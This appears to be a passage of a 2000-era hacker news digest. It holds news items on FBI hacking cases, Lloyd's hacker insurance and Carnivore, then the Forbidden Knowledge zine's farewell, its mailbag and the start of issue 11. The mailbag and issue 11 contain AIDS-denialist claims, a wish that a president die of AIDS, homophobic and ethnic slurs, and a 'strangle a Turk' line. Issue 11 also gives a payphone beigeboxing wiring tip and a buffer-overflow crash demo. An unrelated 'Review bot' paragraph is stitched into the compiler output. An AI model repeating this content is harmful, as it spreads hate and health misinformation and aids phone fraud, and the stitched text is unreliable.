Martin is an Assistant Director with the Infocomm Development Authority (IDA)
of Singapore. He takes charge of security incident management, where he
oversees a group of IT Security Consultants in providing security services to
the various government organizations. He is also the Programme Manager of the
Singapore Computer Emergency Response Team (SingCERT), which is the national
level security incident response center charged with the prevention, detection
and resolution of computer security incidents on the Internet and Singapore
ONE.
He manages a group of Security Consultants providing incident resolution and
security awareness promotion services to the local IT industry and general IT
users. Martin is a frequent speaker on subjects regarding security and incident
handling. He last spoke at the PKI Conference on "Instilling Trust for Secure
eCommerce" organized by CommerceNet Singapore in October 1999.

Their Presentation! (PowerPoint 107k) / See It! (surestream video file) /
Hear it! Real Audio (28k-isdn surestream)

@HWA

289.0 [IND] FBI Investigating Qualcomm Hacker
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.infowar.com/hacker/00/hack_070800a_j.shtml

7/05/00

FBI Investigating Qualcomm Hacker
By Staff, Newsbytes

WASHINGTON, D.C., U.S.A., 07 Jul 2000, 2:53 PM CST

The FBI is investigating a University of Wisconsin student as a possible
suspect in a series of hacker attacks against wireless provider Qualcomm,
according to a San Diego Union-Tribune story today.
The FBI has accused a University of Wisconsin graduate student of hacking into
San Diego-based Qualcomm's computer networks, replacing files and installing
"back doors," which allowed him to re-enter the system from a number of points
on the network, the story reports.

According to documents filed in San Diego federal court, the intrusions pierced
Qualcomm's firewalls and network security, and jeopardized a number of the
company's crucial servers that contain proprietary information.

The story also reports that investigators learned the student broke into
computer networks operated by three other companies, including NetOptions, a
Los Angeles-based Internet service provider; CISNet of Youngstown, Ohio; and
the TeX Users Group, an organization based in Massachusetts for those
interested in text typesetting and font design.

The FBI declined to comment on the case, and Qualcomm officials did not return
calls seeking comment.

@HWA

290.0 [IND] Lloyd's Offers Hacker Insurance
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.infowar.com/hacker/00/hack_071000a_j.shtml

7/10/00

Lloyd's Offers Hacker Insurance
By The Associated Press
Special to CNET News.com
July 9, 2000, 11:30 p.m. PT
http://news.cnet.com/news/0-1005-200-2232221.html

Lloyd's of London will offer up to $100 million in insurance coverage to
clients of computer-security management firm Counterpane Internet Security
against hacker-related losses to its business or its customers.

San Jose, Calif.-based Counterpane in its announcement today claimed to be the
first Internet-security service provider to offer a guarantee of direct
financial reimbursement in the event a hacker breaks through its defenses and
uses customer data. The guarantee is underwritten by insurance brokers Frank
Crystal & Co. and SafeOnline, with additional coverage available for purchase
from Lloyd's.

"This is not for your home user; this is for Yahoo, this is for CD Universe,
which lost all those credit card numbers (to a hacker) in January," said Bruce
Schneier, chief technology officer at Counterpane. "It's threat avoidance.
This, along with monitoring, is just another arrow in your quiver."

Standard computer security includes firewalls, antivirus software that is
updated weekly, and systems that can prevent the entry of hackers. But experts
say much of that software contains weaknesses that can be exploited by
enterprising hackers.

An FBI-funded report in March suggested an epidemic of computer crime is under
way across the United States, based on 643 responses, mainly from large
companies and government agencies. Since March 1999, nine out of 10
organizations reported computer security breaches, according to the annual
Internet crime survey by the FBI and the San Francisco-based Computer Security
Institute.

The most common forms of unauthorized computer intrusions are viruses, stolen
laptop computers and employees abusing their Internet privileges. But
businesses increasingly are reporting more serious incidents, including system
penetration from the outside, financial fraud, data network sabotage or
denial-of-service attacks--a deluge of repetitive requests sent to clog a Web
site's computers until they seize up.

Various organizations have estimated that hacker attacks this year have cost
businesses tens of billions of dollars, mostly in lost time. A study released
last week by Jericho, N.Y.-based Reality Research estimated businesses
worldwide will lose more than $1.5 trillion this year because of computer
viruses spread through the Internet. The "I Love You" virus, spread via email
earlier this year, affected about 45 million computer files at a cost to
companies of $2.61 billion alone, according to Computer Economics.
Counterpane's Schneier said a $20,000 annual premium will provide coverage for
$1 million in hacker losses; the cost rises to $75,000 for $10 million in
losses. The price of any additional coverage, up to $100 million, must be
negotiated with Lloyd's.

Some regular insurance policies pay hacker losses under loss-of-business or
act-of-vandalism clauses, but there are few policies written to specifically
cover hacker attacks. And those that do often carry premiums that start at
$100,000 and run up to $3 million.

Analysts say the hacker insurance market is expected to grow to billions of
dollars in annual premiums by the end of the decade, reflecting the growing
popularity of e-commerce. But insurers have been reluctant to be the
groundbreakers because there are no effective tools for measuring the risk.

Insuretrust.com also assesses security risks but provides protection only for
what it calls "residual risks." IBM and insurance broker Sedgwick Group provide
products ranging from security reviews to compensation for lawsuits brought by
victims of online credit card fraud. And International Computer Security
Association, an Internet security company, announced in 1998 that it will pay
corporations up to $250,000 if hackers successfully crack its computer system.

Copyright © 2000 Associated Press. All rights reserved. This material may not
be published, broadcast, rewritten, or redistributed.

@HWA

291.0 [MM] Man charged with breaking into NASA computers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

July 12 2000
Source: MSNBC
Submitted by: Spikeman

http://www.msnbc.com/news/432167.asp?0nm=O11R

Man charged with breaking into NASA computers

WHITE PLAINS, N.Y., July 12 - Federal authorities today arrested an alleged
hacker who they say broke into NASA computers in 1998 and used one to host a
chat room for other hackers.

Mary Jo White, the U.S. attorney for the Southern District of New York,
indicted Raymond Torricelli, 20, aka "rolex", on five felony counts for credit
card fraud, interception and unauthorized access to two National Aeronautics
and Space Administration computers. White alleged in court documents that
Torricelli broke into two computers at the agency’s Jet Propulsion Laboratory
(JPL).

Prosecutors allege the hackers, part of a group called #conflict, chatted about
hacking, cracking, credit card fraud and how to use their computers to alter
the results of the annual MTV Movie Awards, White said in a statement.

CODES DECRYPTED

Torricelli allegedly used the other JPL computer to place a sniffer program to
intercept computer user names and passwords on networks. Prosecutors said they
discovered 76,000 such passwords on Torricelli’s home computer, many of which
had been decrypted. Torricelli allegedly also cracked 800 other computers in
his online sneaking spree.

Conviction on the credit card fraud and password possession charges could lead
to 10 years in jail and a $250,000 fine. The password interception charge
carries a possible five-year term and $250,000 fine, and the two charges for
computer intrusion are punishable by a year in jail for each count.

WENT HOME TO MOM

Torricelli’s court-appointed attorney, Suzanne Brody of Federal Legal Aid, said
she had not yet had a chance to discuss the case in depth with her client. She
said his computers were seized two years ago following the alleged activity,
but Torricelli was not arrested then.

Before being released on $50,000 bond today, Torricelli was understandably
frightened by the experience of being arrested by federal authorities, Brody
said. "We got him bailed out, and he went home to his mother," Brody said.
Torricelli is from New Rochelle.
Last December, another New Rochelle teenager was sentenced for hacking America
Online’s computer system after gaining knowledge of the Internet service
provider working as a technical support volunteer for the company.

@HWA

292.0 [MM] The FBI's Carnivore(s) Initiative (More big brother)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MSNBC
http://www.msnbc.com/news/432143.asp

Forget the FBI’s snooping - What about your boss?
By Lisa Napoli
© MSNBC

July 12 - Lots of people have their knickers in a knot over this unfortunately
named surveillance program the FBI is using called Carnivore. (Sounds like a
sequel to Survivor, but in actuality, it’s a sniffer that tracks the e-mail of
criminal suspects.) The notion of the FBI forcing an Internet Service Provider
to check out the e-mail of some bad guy isn’t such a terrible idea, on the face
of it, though it certainly isn’t as sexy as a high-speed chase or something out
of Shaft. Remember, folks, though it’s easy to forget: Law enforcement is
actually good for society, and technology can aid and abet in the quest for law
and order.

But it’s the opportunity for screw-ups, and abuse, that has the American Civil
Liberties Union, among others, concerned. Marc Rotenberg of the Electronic
Privacy Information Center summed it up nicely: "It goes to the heart of how
the Fourth Amendment and the federal wiretap statute are going to be applied in
the Internet age."

Of course, there is the possibility that the FBI would inadvertently read your
mail in addition to that of the suspects, and not only violate your privacy,
but perhaps get you into trouble as well. (Two-for-one?) For that very reason,
the infamous and ground-breaking Dutch ISP, XS4ALL, refused to comply with its
governmental authorities three years ago when they asked to tap into one of
their customers. Since then, the Dutch government has passed a shiny new
telecommunications law that would give them the power to conduct such a digital
wiretap.

Here in the United States, we have the Electronic Communication Privacy Act, a
1986 law that is being interpreted by the government as allowing digital
wiretaps using software like Carnivore.

And while all that is interesting, what everyone seems to be forgetting is that
your boss is more likely to be reading your e-mail than the FBI. This, from the
latest American Management Association Monitoring and Surveillance study:
"Nearly three quarters of major US firms record and review employee
communications and activities on the job, including their phone calls, e-mail,
Internet connections, and computer files," the group reports. That’s twice what
the AMA found in 1997, when the survey was first conducted.

One of the most infamous users of blocking software in the workplace is
Bloomberg, the financial news service. Starting in June 1999, Bloomberg started
scanning outgoing e-mail on the service for words that the company considered
racist, profane, or offensive. When the policy was first instituted, cheeky
employees kept testing the waters to see which words would make it through.

But just because your workplace mail isn’t scanned doesn’t mean someone isn’t
watching. Stories about software that monitors your surfing activity to see if
you’re wasting time on the clock are common. And keep in mind: Your superiors
may start watching you if they suspect a problem. Case in point: The New York
Times Co. says it doesn’t routinely scan e-mail, unless there have been
complaints. And last year, complaints about racy e-mails circulating led to the
firing of 23 people at an administrative facility in Virginia.

The potentially thorny privacy issues raised by Carnivore are an issue, to be
sure, but what you say and how you surf at work might get you into more
trouble, more immediately.

Have you had an experience where your e-mail activity at work has been
monitored? I’d love to hear from you.

@HWA

293.0 [IND] Forbidden Knowledge calls it quits.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.mdma.za.net/fk
http://www.mdma.za.net/fk-farewell.txt

+--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+
(              F 0 R B 1 D D 3 N   K N 0 W L 3 D G 3                         )
+--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+
(                    T h e   F i n a l   C h a p t e r                       )
+--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+

Soundtrack for this Notice: REM - At my most beautiful

The Forbidden Knowledge project, born just over a year and a half ago, has
drawn to a close. Not because there were any fall-outs among us, or because
I've lost interest, but simply because better opportunities have come along.

Basically, Kokey was pondering reviving his e-zine, but was uncertain of his
time constraints. I on the other hand was busy with mine, but not getting
enough support. Our respective problems had a natural solution and that was
working on a new zine together. (And besides, I can't risk the chance of Kokey
releasing an e-zine that 0wnz mine unless I'm working on it too. ;P)

So, yes, in some ways FK is dead, and in others, it lives on. I will still be
working on something and releasing my warped texts on a quasi-regular basis,
and they will still have that Wizdumb-esque insanity that makes them virtually
unreadable. But FK as you know it is a thing of the past. And it will be sorely
missed by me especially.

Special thanks to everyone who has helped out with the zine in any way, whether
it be feedback or article submissions, or whatever - I love you all. And for
the record, here are all the people who submitted to FK, in chronological
order...

  Wizdumb
  Pneuma
  Gevil
  Opium
  Brainsaw
  Cyberphreak
  Moe1
  Hitsquad
  Vortexia
  Flashfire
  supo
  Nakamura
  Terabyte
  jus
  Cyberware
  CoLdBLood
  DrSmoke
  Sigma
  MercEnarY
  Virulent
  Jumpers
  DvD
  JungleG

And there you have it ladies and gentlemen. The credits have rolled, the lights
have come back on, and the few who are still in the room are on their way out.
But hey - it's not too long before the first issue of the new, as yet to be
named zine - which will totally 0wn FK anyway. So be sure to stay tuned to
http://scene.textfiles.com watching out for it. :)

Sorry that there are no articles in the final installment of FK, they've all
been hijacked for the new zine. But I feel bad using nothing of the old FK12.
Hmmm... Okay... Just to have something, I'll tack the mailbag from FK12 onto
the end of this.

Once again, Thanks for supporting FK

Wizdumb

-----------------------[ Lame-ass mailbag concatenated for nostalgia's sake

From: 777
To: wizdumb@leet.org
Date: Wed, 17 May 2000 19:04:38 -0700
Subject: Congratulations

Congratulations for your excellent article about Chaos Magick in FK #11!

--
Hail Eris!! All hail Discordia!

[Wizdumb: We're glad you appreciated it - It's quite interesting how many
chaote hackers there are around. Perhaps it has something to do with a lack of
respect for rules and boundaries, or an urge to learn without being restricted.
Or maybe hackers are just smart. :P Thanks for writing.]

-----*****-----******-----

[Wizdumb: Caution, Long Obnoxious Letter follows. Read on at your own risk.]

From: "Drew Hendricks"
To: wizdumb@leet.org
Date: Thu, 18 May 2000 12:38:02 CDT
Subject: http://www.virusmyth.com/aids/index.htm

RE: Thabo Mbeki's public statement (and letter to Bill Clinton) saying that it
can't be proved that HIV leads to AIDS - especially considering how much
goddamn medical experience he has. And lets not even *begin* to consider the
amount of damage a statement like that can cause when almost a *third* of the
world is HIV positive. Thabo Mbeki, I sincerely hope that you get AIDS and die.
I am actually *ashamed* to have such a fucking idiot as a president.
OK, two things first:

The man who announced that the virus he later named HIV causes AIDS was booted out of the American scientific community when it became obvious that he is a lying sack of shit who would sell you a cure for the common cold if he could convince you it was eating your momma's face. His name is Dr Robert Gallo - you should look him up.

The man who invented the Polymerase Chain Reaction and won the Nobel Prize for doing so has personally told me that he has searched in vain for ANY paper which even claims to prove HIV causes AIDS and HE CAN'T FIND ONE. His name is Dr Kerry Mullis. For a Dr, he's a pretty neat surfer dude. Look him up, too.

[Wizdumb: Right, I've been reading for two paragraphs and I haven't learnt anything - something tells me this is going to be one of *those* letters.]

Additional, if you have not already flamed me out of sheer ignorance:

[Wizdumb: No, wait, I've learnt that this man is a pompous butthead. That's something I suppose.]

Just because AIDS is real - and believe me, it is - does not mean that the "conventional" wisdom about its origins is true. MANY people have tested negative for HIV and died of AIDS. MANY people have tested positive for HIV and never been sick. Just look at the case of a certain famous American basketball star, who has been positive for most of a decade...and has yet to be sick.

[ Exiting due to signal SIGSTUPID
  Excessive Stupidity Fault at eip=64756D62 ]

Shit, man - read for yourself and make an informed decision: http://www.virusmyth.com/aids/index.htm

[Wizdumb: Well, I really hate to have to be the one to tell you this, but I guess some-one has to break it to you: The web is the biggest, most widely-accessible source of *bullshit* information on this planet - I wouldn't touch it with a ten-foot barge-pole, let alone believe anything I read on it.]
Better yet, apply a little logic:

The US Military announces in 1970 that it wants "...a synthetic biological agent...that does not naturally exist, and for which no natural immunity could have been acquired." "Most important(ly) ... is that it might be refractory to the immunological and therapeutic processes upon which we depend to maintain our relative freedom from infectious diseases." (91st Congress, Appropriations hearings for Dept Defense, 1970 Dr MacArthur)

>>>He guesses that within 5 to 10 years such an agent would be possible<<<
>>>That puts it right about 1980....<<<

Next, the "gay plague" occurs in New York and other large American cities among sexually active young men, who suddenly have a host of infections more common to organ transplant patients whose immune systems have been artificially suspended. Within a few years, a PRESS CONFERENCE announces a new study by Dr Gallo which WILL PROVE (when it is published) that a new retro-virus is the cause of GRIDS (Gay-Related Immune Deficiency Syndrome).

[Wizdumb: Aaah. I see it now. Let's have promiscuous sex with lots of women and shoot all those goddamn disgusting fags. That sounds like a plan.]

The paper is never published in a peer reviewed paper. A version is finally released, but it does not come close to proving the simple HIV virus could cause ANY immune suppression, much less the complete collapse of the system...it relies instead on a tiny sample of donors who have a high correlation (Many have HIV particles in their blood, and also have AIDS.) No one from a control group is even tested for the virus, since the antibody test is not yet perfected and the other tests are so expensive.

METAPHOR:

[Wizdumb: Oh dear.]

SO - the military announces it will have a supersonic aircraft: The citizens of a town near an airbase hear sonic booms - CONCLUSION: the Air Force probably has supersonic aircraft!
APPLICATION OF METAPHOR:

So- the military announces that it wants an immunity-killer: people start dying of AIDS - CONCLUSION: maybe they were serious, maybe they did come up with something!

[Wizdumb: OMG! That was amazing! Thank you for your wonderful metaphor to explain this to me - I wouldn't have known wtf you were on about otherwise!]

But how do they hide it? Any doctor not on their payroll is capable of publishing a report of the real pathogen and showing that it is obviously an artificial organism with big, fat splices in its DNA...

But let me ask you - who is looking for the cure to polio today? NO ONE.

[Wizdumb: *GASP* No? ]

After all, we know what causes polio. There's a vaccine.

[Wizdumb: *Phew* ]

Who would look for the cause of a disease which is already found? WHERE IS THE HIV VACCINE?

[Wizdumb: *GASP* You HAVE to stop scaring me like this! ]

20 years later, still no vaccine. Lots of evidence that anti-AIDS chemotherapy was deadly during the 1980's and 1990's, but NO VACCINE! Something does not add up, my friend...your president might not be so fucking stupid after all; you did say he has medical experience, right?

[Wizdumb: No, I was employing a device known as sarcasm. You should try to start picking it up better if you want to try to communicate with your species some time.]

HOW MANY HOSPITALS HAVE YOU WORKED IN?

[Wizdumb: None, obviously enough. But my idiocy is only inflicted on a small group of depraved hax0rs who never get laid anyway and thus don't need to worry. If I were president, I could do a significantly greater amount of damage with my opinions. And anyway, is my 0 years experience any less relevant than Thabo Mbeki's 0 years experience? No. I didn't think so.]

(And where in the hell did you get the "1/3 of Earth has HIV" shit? If anything is proof of what Mbeki says, that would be it...think about it! We would all be dying or know someone personally who is...)

Drew

[Wizdumb: My figures were obviously exaggerated.
However, I *DO* personally know somebody with AIDS and *two* with HIV. Maybe you don't know anyone with AIDS because your only friend is your mom and you spend all your time sending long obnoxious e-mails to people who really couldn't care less what the fuck you think?]

-----*****-----******-----

From: "David Knapp"
To:
Date: Tue, 16 May 2000 14:06:56 -0700
Subject: e-zine question

Sorry for being a dumb 'merican - but I have a question about the BMW unlocking procedure. What is the "boot" on a BMW? I am unfamiliar with that term.

ta
dbk

[Wizdumb: LOL, I wasn't actually aware that this was a South-African-ism. Sorry - it's the "trunk" :) Hmmm... I think I could have quite a lot of fun if I developed a huge vocabulary of South-African-specific slang, and then wrote an article on explosives. :P ]

-----*****-----******-----

From: Frits Haas
To: wizdumb@leet.org
Date: Thu, 18 May 2000 05:00:24 -0700
Subject: re : fk11 / C/Khaos magick

greetz ...Rabbit here...

i was quite interested in what u guys had on Chaos magick...although very simplified indeed i've been studying Magick for about 6 years now...more Wicca than anything else...

[Wizdumb: Captain, my tree-hugging hippy radar is going wild :)]

....and if u would like me to contribute anything...gimme a shout (but do not ..*repeat* do not inform Vortexia...he'll 1) blow a vein in his head 2) swear for 1/2 an hour without repeating a word 3) vow to kill me 4) vow to hax0r me (*try* to anyway - lets not go there) 5) etc etc ...i'm sure u know the story by now...

[Wizdumb: Not really, but, HEY VORT, Did you hear what this guy said about your mom?!! Are you gonna let him get away with that?!@#$%^]

although i do not practise Chaos..(i think it's very dangerous)..i know quite a lot about it and of ppl that have burnt their hands on it...(it's more dangerous than u think...)

[Wizdumb: So I've heard. Personally, I keep my Chaos in the fridge, and then only warm it up marginally in the microwave.
I've always been one to play it safe when it comes to this crazy supernatural stuff. :P]

Wicca on the other hand is (in some ways) similar ..and (in other ways) opposite

[Wizdumb: Aaah.]

my personal book of shadows contains about 2900 pages...and i have not yet begun to collect other BOS...this is just my own dealings...

[Wizdumb: *My* Book of Shadows is 0 pages, I have not yet begun to collect my work - this is only what my cat has done.]

anyway... kewl zine dude...keep up the l33t work

[Wizdumb: Glad ya like it. Keep reading, when the new zine comes out, bro. :)]

regards,
Rabbit aka Frits
bright blessings and merry part

-----*****-----******-----

From: "k-rad-bob"
To:
Subject: h0h0!
Date: Sun, 21 May 2000 23:45:47 +0200

reading fk11 almost made me ejaculate in my pants (i read it at work of course) and i simply had to email you guys.

[Wizdumb: Are you implying that you don't wear pants when not at work?]

b0g loves you!!!!!

[Wizdumb: We love b0g!!!! :)]

since you guys are so lovable i'll add fk to the zines section (when im bothered that is, im pretty lazy/buzy these days)

til then, have fun and strangle a Turk!

oh, and by the way: FUCK OFF!#@!

yours in cyberspace
k-rad-bob

[Wizdumb: Fuq j0o!@#$ We officially return j0r wage of war, and are giving full priority to the destruction of b0g. Not only will we 0wn b0g.org, but we will 0wn b0g.org. Furthermore, we will 0wn b0g.org. We have also started a b0g mirror at www.mdma.za.net/b0g solely to deface it at a later date - 0h0h0h0]

-----*****-----******-----

Date: Tue, 23 May 2000 16:06:14 -0700 (PDT)
From: Richie Hasting
To: wizdumb@leet.org
Subject: greets Wyzewun fellow telkom h8terz
X-Mailer: Excite Inbox
X-Sender-Ip: 196.22.171.126

Hiya greets form a phreaker,hacker in ZA your info is hardcored but I have even more 2 add like how 2 remoteley controll a ISP's pop servers power remoteley as well as how to phreak fone linez of people living in flats, and how 2 cover ones tracks.
I ALSO HAVE KNOWLEDGE IN THE CELLULAR INDUSTRY USING SOCIAL ENGENEERING SKILLZ TO GET WHAT I want.

[Wizdumb: OMG! This is my favourite type of e-mail! The type where you just sit and wonder what the FUCK the dildo on the other side is trying to get across to you. Sometimes, late at night, you can read over them and they almost make sense - granted that you've had a good few shots of vodka prior to reading that is. Regardless, these rock - send more please.]

I am currently in the process of cloning telephone cards but only one problem I NEED @ OBTAIN A TELKOM GREEN PHONE card machine as i NEED THE READER, have u any ideas 2 break the green bastard open and get the insides (die binne goed) out....

[Wizdumb: Okay, I have now established that the writer is Afrikaans, so should I forgive him for not being able to speak English? Hmmm... Naah, if his English sucks this much then he should've written to me in Afrikaans for crying out loud.]

Pls email me to get more info outa me, if u don't email me I'll think I am not 3l33t3 enuff.

[Wizdumb: Guess yer not "3l33t3" enuff, eh?]

Regards
Naz-t1 also known as naz-1
eail me...
Cheerz

[Wizdumb: *Sigh* I hate this job... When is that transfer coming through?]

NO CARRIER

@HWA

As a sort of homage, here is issue #11, the final release of FK for the archives. - Ed

===---===---===---===---===---===---===---===---===---===---===---===---===---
Forbidden Knowledge Issue Eleven: Released 16th May 2000AD
Leet0 Wizdumb's 17th Birfday Ish!@#$%  Happy Birfday to Me!@#$%^

---===---===---===---===---===---===---===---===---===---===---===---===---===

Shout Outz
+-======-+

MDMA, Sigma, DrSmoke, TimeWiz, meiso, Coldblood, Rawhed, JungleG, RIFT, {}, Slash, b0f, Most of the hoez from Blabber.Net's #hack (Aragon, Opium, acid, xanex, et al), Pushers who give LSD to Five Year Olds, Cruciphux, Gevil, All the blasphemers from article 0x45, Catholic School Girls that give good head

Fuck Youz
+-=====-+

Catholic School Girls that DON'T, People who can't see the humour in the abuse of homeless people, Homeless People, All the hoez in the acne remedy commercials with no acne, *!*@dal.net, *!*@under.net, People who wait until the *END* of the answering machine message before they hang up, Defacers, People who think defacers have skillz, People who write e-zines, People who think people who write e-zines have skillz, Loud Annoying Evangelical Churches, kppp users, Broccoli

Movies of the Month:
American Beauty
South Park - Bigger, Longer and Uncut

Sites of the Month:
Info Regarding Egodeath      hv2k.voltage.org
My Personal FK Mirror        www.mdma.za.net/fk
H/P E-Zine Community         scene.textfiles.com

Narq of the Month: MostHateD (Congratulations!@#$%^&)

Windoze 9x command of da month: copy /Y c:\windows\logos.sys c:\logo.sys

Short Story of the Month: "The Doom that came to Sarnath" by HP Lovecraft

Fun: Walking out the plane in Zimbabwe's airport wearing a T-Shirt that says "Whites rule. The Zimbabwean government is hiding the aliens from us. Gay Rights now."
Official FK11 Soundtrack: KoRn, Limp Bizkit, Rage Against the Machine, Bush, Eminem, Red Hot Chilli Peppers, Rammstein, Pixies, Springbok Nude Girls, Radiohead, Bloodhound Gang, Our Lady Peace, Cypress Hill, Blink182, Orgy

Scary: Seeing an automatically flushing urinal for the first time ever just after eating Psilocybe Mushrooms

Oh: If you have copies of Forbidden Knowledge printed out and lying in your office's waiting room like we have heard several people have - PLEASE PLEASE PLEASE take a photo of them and your waiting room, scan them in, and e-mail them to wizdumb@leet.org ;-) Don't have a scanner? E-mail us for a snail mail addy, but just GET US THOSE PICTURES. =)

Amusing: Thabo Mbeki's public statement (and letter to Bill Clinton) saying that it can't be proved that HIV leads to AIDS - especially considering how much goddamn medical experience he has. And lets not even *begin* to consider the amount of damage a statement like that can cause when almost a *third* of the world is HIV positive. Thabo Mbeki, I sincerely hope that you get AIDS and die. I am actually *ashamed* to have such a fucking idiot as a president.

Contents of Forbidden Knowledge Issue 11
________________________________________________________

0x90> Credits
0x90> Editorial
0x90> Mail from the Readers

Articlez...

0x30> Byteware of the Month [Wyze1, Jus, DvD]
0x31> Unlocking Cellphones without the Mastercode [Moe1]
0x32> Hacking Reality: An Introduction to Khaos Magick [Wyzewun]
0x33> Details of Microsoft's Space Exploration Plan [Pneuma]
0x34> K-Rad Oh-Day Christianity Warez [Various]
0x35> Cisco PIX (and others) Denial of Service Attack [Vortexia]
0x36> An Introduction to Java Servlets [Wyzewun]
0x37> Fixing M-Web Specific Modems [JungleG]
0x38> Miscellaneous IRC Gayness [Various]

Other junk...
0x41> The Mysterious blommetjies.jpg (Zoom In :P) [Wyzewun]
0x42> Completely Useless killmod.php3 Warez [Wyzewun]
0x43> Internet Explorer 4/5 Hostile VBScript [Wyzewun]
0x44> Share Password Extractor Version 2 [Sigma]
0x45> Microsoft Access 97 Database Password Remover [Wyzewun]
0x46> Lame Ass Win9x/NT4 Backdoor [Wyzewun]
0x47> Windoze Dialup Account Login Ripper [Sigma]
0x48> B0nus Super-el8 Esteban Warez [Various]
0x49> MDMA Advisories #2 through to #4 [Wyzewun]
0x50> Various Stupid-ass DoS vulnerabilties [Wyzewun]
0x90> Outro

__________________________________________________________________
_. People who made this Issue possible ._

The Usual Bitchez who contributed...
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Wyzewun
Pneuma
Vortexia
Moe1
Jus

Special Thanx to Deeze Guest Bitchez...
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
JungleG
Sigma
DvD

__________________________________________________________________
_. Editorial by Wizdumb ._

So last week me and my bitchez...

__________________________________________________________________
_. Mail from The Readers ._

Date: Tue, 4 Apr 2000 08:43:39 -0500 (CDT)
From: Al Mccain
To: wizdumb@leet.org
Subject: got a question about someone..
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

sigma, where is he from? think i know him, just not sure.

[Ed: I replied with "Huh? Who are you?" and I kinda never heard from him again, HEH! ;-P Still - mail like this worries me.]

------

[Ed: I posted something to scene.textfiles.com to the effect of "Forbidden Knowledge Issue One to Ten released, but we were too dumb to notice" and got the following reply...]
X-Authentication-Warning: lala.navpoint.com: mogel owned process doing -bs
Date: Fri, 7 Apr 2000 15:55:38 -0500 (EST)
From: mogel
X-Sender: mogel@lala.navpoint.com
To: Wyzewun
Subject: FK and scene.textfiles.com
In-Reply-To: <200004071104.EAA31560@nak.dreamhost.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

I'm glad you wrote me, I tried to contact you like two months ago, but those addresses bounced back. I added you folks to the site... feel free to shoot me an email whenever you guys release, and I'll announce it on my site. You might consider making a mailing list to announce whenever there's a release to readers, or something. Keep in touch.

-Mogel

[Ed: More about this at the end of the zine]

__________________________________________________________________
_. Byteware ._

Byteware from Wyzewun...

When beigeboxing a South African cardphone, you are interested in one of the white wires and the blue wire, okay?

------

Telkom's new boxes look like this...

   ___________
  /    ()     \
  -------------
  |   ___     |
  |   \  \    |
  |    \__\   |
  |    OOO    |
  |    OOO    |
  |    OOO    |
  |           |
  |           |
,,,,,,,,,,|___________|,,,,,,,,,,

Okay, so my ascii art sucks (I guess I shoulda gotten Cyberphreak to draw this) but what the fuck. Regardless, they're tall and thin, and are opened at the top using the little hole which I pathetically tried to depict. ;-P

It appears that these boxes are Telkom's new preferred system, and they are worth finding ways to break into (That preferably don't involve kicking the whole thing to pieces) - and if you succeed in breaking into one - write us an article on it!@#$% :-)

------

No-one sends fuck you'z to the FK editorial staff in their e-zines! We feel unimportant! Pleeze Pleeze Pleeeeze - you're not hardk0re if you don't have an el8 rival zine that hates you! :-( Actually, I have a feeling this approach isn't going to work. Hmm... Plan B...
Phrack  : FUCK YOU!@#$%^&
BoW     : FUCK YOU!@$%&^&*
f41th   : FUCK YOU!@#$%
FK      : FUCK YOU!#$#%^... No... Wait a Minute...
b0g     : FUCK YOU!#@$^&*
b4b0    : FUCK YOU!@#$%&*
ch4x    : FUCK YOU!@$#%&(
~el8    : FUCK YOU!$#$^*(%
HWA.HN  : FUCK YOU!@##$%^$&
NoU     : TAKE 0FF J0R CL0THEZ!#@%%$&&*

------

Here's an *EXTREMELY* simple little patch for tcp_seq.h I wrote for FreeBSD (tested on 3.4-RELEASE, but should work on 2.2 - 4.0) to increase security and to stop nmap from recognizing the OS (which is the real reason I wrote it, the extra security offered is not really necessary :P). This just shows you how simply a TCP/IP fingerprint can be spoofed... Once extracted just run patch tcp_seq.h diff.file in /sys/netinet

--- cut diff file here ---
96c96
< #define TCP_ISSINCR (122*1024 + tcp_random18())
---
> #define TCP_ISSINCR (random())
100c100
< #define TCP_ISSINCR (250*1024) /* increment for tcp_iss each second */
---
> #define TCP_ISSINCR (random()) /* increment for tcp_iss each second */
--- cut diff file here ---

------

Looking through the logs on Pneuma's box I found this...

Well, the buffer overflow examples are a little lame ... but, it actually seems okay at second glance.
hehhehehehe, it usually is, it grows on you
THough, I could see why you might have to try so hard -- it's on Windoze ......
whats on windows?
The buffer overflow program example.
heh, its aimed at newbies and compiles under *nix neway :P
Well, it's also C++ ... cin >> of course checks for buffer overflows.

*Sigh* I hate it when idiots try and make it look like *I'm* wrong...

C:\temp>type gay.cpp
#include <iostream.h>

void main()
{
  char beer[5];   /* five bytes; cin >> has no idea how big this is */
  cin >> beer;
}

C:\temp>cl gay.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.

gay.cpp
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
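Review bot: both hunks of the tcp_seq.h diff above are keyed to absolute line numbers (96c96, 100c100) with no context, so on any release where tcp_seq.h differs by even one line before those defines, patch will reject the hunk or rewrite the wrong line; for the 2.2 to 4.0 range the text claims, a context diff keyed on the `#define TCP_ISSINCR` lines would survive the drift. The surrounding note should also spell out what the change buys: replacing the fixed 122*1024 and 250*1024 increments with random() removes the constant-increment pattern a fingerprinter keys on, but random() is a general-purpose PRNG, so how unpredictable the resulting sequence numbers are to a spoofing attacker depends entirely on how it is seeded, and the diff leaves the initial tcp_iss value untouched.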
/out:gay.exe
gay.obj

C:\temp>gay
AAAAAAAAAAAAAAA

GAY caused an invalid page fault in module at 00de:00414141.
Registers:
EAX=004089a0 CS=015f EIP=00414141 EFLGS=00010246
EBX=00530000 SS=0167 ESP=0063fe00 EBP=41414141
ECX=0000000a DS=0167 ESI=8162c000 FS=1a8f
